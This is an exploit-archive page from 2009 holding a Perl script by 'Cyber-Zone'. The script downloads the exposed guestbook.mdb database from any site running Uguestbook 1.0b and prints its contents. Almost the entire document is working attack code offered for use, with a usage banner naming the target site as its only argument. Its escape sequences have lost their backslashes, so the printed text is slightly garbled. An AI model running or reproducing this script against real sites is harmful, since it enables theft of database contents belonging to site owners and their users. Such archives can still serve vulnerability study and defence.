[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Uguestbook 1.0b (guestbook.mdb) Arbitrary Database Disclosure Exploit
# Published : 2009-05-04
# Author : Cyber-Zone
# Previous Title : ProjectCMS 1.1b Multiple Remote Vulnerabilities
# Next Title : Ublog access version Arbitrary Database Disclosure Exploit


#!/usr/bin/perl
#
#
# Uguestbook 1.0
# mdb-database/guestbook.mdb
#
#
#
#
#
#
#
use LWP::Simple;
use LWP::UserAgent;

print "tUguestbook 1.0 Arbitrary Database Disclosure Exploitn";

print "t****************************************************************n";
print "t*      Found And Exploited By : Cyber-Zone (ABDELKHALEK)       *n";
print "t*           E-mail : Paradis_des_fous[at]hotmail.fr            *n";
print "t*          Home : WwW.IQ-TY.CoM , WwW.No-Exploit.CoM           *n";
print "t*               From : MoroccO Figuig/Oujda City               *n";
print "t****************************************************************nnnn";
if(@ARGV < 1)
{
&help; exit();
}
sub help()
{
print "[X] Usage : perl $0 site n";
print "[X] Exemple : perl $0 www.site.com n";
}
($site) = @ARGV;
print("Please Wait ! Connecting To The Server ......nn");
sleep(5);
$database = "mdb-database/guestbook.mdb";
my $exploit = "http://" . $site . "/" . $database;
print("Searching For file ...nn");
sleep(3);
$doexploit=get $exploit;
if($doexploit){
print("..........................File Contents...........................n");
print("$doexploitn");
print("..............................EOF.................................n");
}
else {
help();
exit;
}

# www.Syue.com [2009-05-04]